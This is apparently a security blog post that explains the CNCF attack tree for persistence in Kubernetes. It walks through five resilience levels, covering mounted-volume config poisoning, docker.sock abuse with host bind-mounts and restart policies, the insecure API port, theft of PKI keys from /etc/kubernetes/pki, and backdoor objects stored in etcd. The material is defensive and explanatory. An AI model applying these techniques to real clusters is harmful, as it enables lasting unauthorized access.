Understanding the CNCF Persistence Attack Tree in K8s

Persistence is a mechanism an attacker can perform to stay inside a system after gaining access. They don’t just come and go. They build a secret base. From there, they launch attacks, steal data, or spread across the cluster. If we don’t detect them early, they hide and grow stronger.

In Kubernetes, persistence is hard to detect because clusters are dynamic. Pods die. Nodes restart. Workloads shift. But attackers adapt. They use clever tricks to survive each change.

The CNCF Financial Services User Group created an attack tree that shows five common ways attackers create persistence in Kubernetes. In this post, we’ll explore each branch to understand the different mechanisms of persistence an attacker could use against our K8s clusters

The Persistence Attack Tree

The goal of this attack tree is to map out the different paths an attacker can take to stay inside a Kubernetes cluster, each offering a different level of permanence. The tree splits into two main branches.

The first branch explores the different paths that an attacker can take after an attacker gains access to a container. From there, they take advantage of misconfigurations in the cluster. These weaknesses allow them to stay in the system—even if containers, pods, or entire nodes are restarted

The second branch explores a direct strategy: accessing and reading secrets stored within the cluster. By uncovering these sensitive details, an attacker can move deeper into the system, exploiting weak points and establishing a lasting presence.

With both the two branches, the CNCF attack tree covers different types of persistence depending on how much resilient is the persistence in the K8s environment that the attacker manages to establish. The CNCF considers 5 types of persistence:

Foothold with no resilience
Foothold with resilience to container restart
Foothold with resilience to Pod deletion/creation
Foothold with resilience to Node restart
Foothold with resilience to Node recycling (e.g. restore from etcd backup)

Let’s see them in detail

Foothold with no resilience

This kind of access is fragile. If the container restarts or is deleted, the attack ends. The intruder loses access. It seems harmless—but it’s not. Even though this is. a short-lived entry point it still gives the attacker a chance to act.
The entry point for this path is a compromised container. Once inside a container, an attacker will try to start a new process inside the container.

For the attacker, it’s better to act from the container rather than creating new pods/containers. Why? Because that makes detection much harder, new workloads in the K8s cluster is more suspicious.

To do this, the attacker often uses what’s already there. Many containers (not properly secured) come with built-in tools—package managers, scripting languages, and network utilities. These tools become weapons. The attacker uses them to download code, connect to remote systems, or scan the network. Because the activity comes from trusted software, it also makes it difficult to detect and hence it will probably not trigger alerts.

The downloaded tools often serve one purpose: to help the attacker move forward. They may use them to raise their access level, maintain control, or reach out to other parts of the cluster. From this single container, the attacker starts looking for other targets—pods, services, or even outside servers. This is how a simple access point can lead to lateral movement across the system.
Even without resilience, this kind of access can damage the cluster. We must not ignore it. Early detection is critical.

Foothold with resilience to container restart

In this scenario, the attacker will also exploit a compromised container. Once the attacker gains access to the container, they can try to establish persistence by getting access to configuration files stored on a volume of a container. This might give the attacker broader access to applications and services across the cluster. So, to continue this attack path, first the attacker needs to find a container that contains configuration files of the app running on that container.

If the attacker manages to modify configuration files, that gives the opportunity to the attacker to change settings in the container that will allow the attacker to keep access to the container, even if the container restarts. For example, they might alter an NGINX configuration to expose sensitive files or disable authentication checks. If the container uses a mounted volume, those changes don’t disappear when the container restarts—they stay in place, written outside the container’s temporary file system.

To activate these changes, the attacker may trigger a container restart. Once the container starts again, the modified settings take effect. At that point, the attacker has succeeded. The configuration is now poisoned, and the attack persists across restarts.

Foothold with resilience to pod deletion/creation

In the previous scenario, if the config files that the attacker modifies are stored in a persistent volume, then the persistence that the attacker injected will also survive the pod deletion and (re)creation.

Foothold with resilience to Node restart

To achieve this level of resilience, the attacker will try to find an important vulnerability within the container - a mounted docker socket. Why is this a vulnerability?
In many container setups, especially in Kubernetes nodes or developer environments, the host’s Docker socket (/var/run/docker.sock) is mounted inside a container. This socket is the communication interface between Docker CLI or API clients and the Docker daemon running on the host.
When we mount this socket inside a container, we allow the container to talk directly to the Docker daemon as if it were the host. This is often done to run containers inside containers ("Docker-in-Docker") or to allow tools like CI/CD agents to manage containers on the host.
If a container has the Docker socket mounted and an attacker breaks into it, they can escape the container and interact with the host's Docker engine. The attacker can then exploit this vulnerability to get persistence in three ways:

Deploy Host-Level Containers: They can run new containers outside the Kubernetes context, directly on the host, detached from cluster policies or RBAC. These containers may contain backdoors, cryptominers, or networking tools. If the attacker deploys a container using the Docker socket outside the control of Kubernetes, the cluster won’t track or manage it. They can configure the container to run in the background and restart on boot using Docker’s restart policies (--restart=always). Since this bypasses Kubernetes entirely, even if the node restarts, kubelet restarts, or the cluster is cleaned at the pod level—the attacker’s container or system process remains active.
Bind-Mount the Host Filesystem: The attacker can create containers with access to the host’s file system using mounts like -v /:/host, allowing them to tamper with system files like /etc/systemd/system/, install rootkits, or set up cron jobs on the host. These files are part of the host boot process, they are run automatically on the restart of the node. That gives the attacker the persistence in the node.
Add Services or System-Level Changes: By writing to host locations or tampering with startup scripts, the attacker can set up processes or daemons that restart automatically when the node restarts.

Foothold with resilience to Node recycling (e.g. restore from etcd backup)

How can an attacker gets this level of persistence? Three possible paths to get to that

First option for the attacker could be to target the Kube API server. In early Kubernetes versions (or misconfigured environments), the API server might expose an insecure, unauthenticated interface on localhost:8080. This endpoint does not require authentication and was originally intended for local debugging or internal communication. If a container running on the node can access this port—especially if it’s privileged or has access to the host network—it can send requests directly to the Kubernetes API without needing any credentials.

Once an attacker gains access to a container with access to port 8080, they can talk directly to the API server as if they were an admin. This allows them to:

Create Malicious Kubernetes Resources

They can create or modify core cluster objects like Deployments, DaemonSets, CronJobs, MutatingAdmissionWebhooks

Inject into etcd

The API server writes all Kubernetes state to etcd, the central database for the cluster. When a new node is recycled or restored, it fetches configuration from etcd. So, if the attacker creates a malicious Deployment, backdoored image, or autonomous Job via the API server, those objects get written into etcd and survive any node wipe.

Set Restart Policies or Scheduled Jobs
By creating resources that are designed to run again and again, such as a CronJob that spawns backdoor pods daily, the attacker maintains presence even if the pods or nodes are deleted.

Second option for the attacker is to target the PKI to create or use existing certificates and private keys to authenticate as trusted entities.

How Can an Attacker Compromise the PKI?

If an attacker gets access to a container—especially a privileged one—they may be able to:

Mount the Host Filesystem:
If the container can access the host, they can read sensitive paths like:

/etc/kubernetes/pki/
/var/lib/kubelet/pki/
or wherever the PKI material is stored on that node

Steal or Copy Certificates:
They extract:

Client certificates for kubelets, admins, or controllers
Private keys
The cluster’s CA certificate (possibly also the key)

Create Their Own Certificates:
If the attacker gets the CA private key, they can generate new, valid Kubernetes client certificates. These certificates can impersonate nodes, users, or even the kube-apiserver itself.
Use Certificates to Access the API Server:
The attacker can now talk to the Kubernetes API as any valid user or component. They are no longer bound to a specific node or container. They’ve unlocked the front door to the entire control plane.

With that the attackers can get unrestricted access to the cluster and then they could search for privileged workloads such as containers or pods running in privileged mode which would make the attacker access, and eventually control, resources in the host node.

Lastly, the third option for an attacker is, after compromising the PKI, using the Kube API server client certificate target the etcd, the source of truth for the whole cluster. With valid client certificates, the attacker can create or modify Kubernetes objects using the API server, just like any cluster admin. They can inject:

Backdoored Deployments
DaemonSets that respawn across the cluster
CronJobs that re-establish access
Mutating or validating admission webhooks that modify workloads

These objects are stored in etcd. Even if a node is recycled, wiped, or rebuilt from backup, etcd will still hold the malicious resources. Kubernetes will faithfully restore and run them—because it doesn’t know they’re malicious.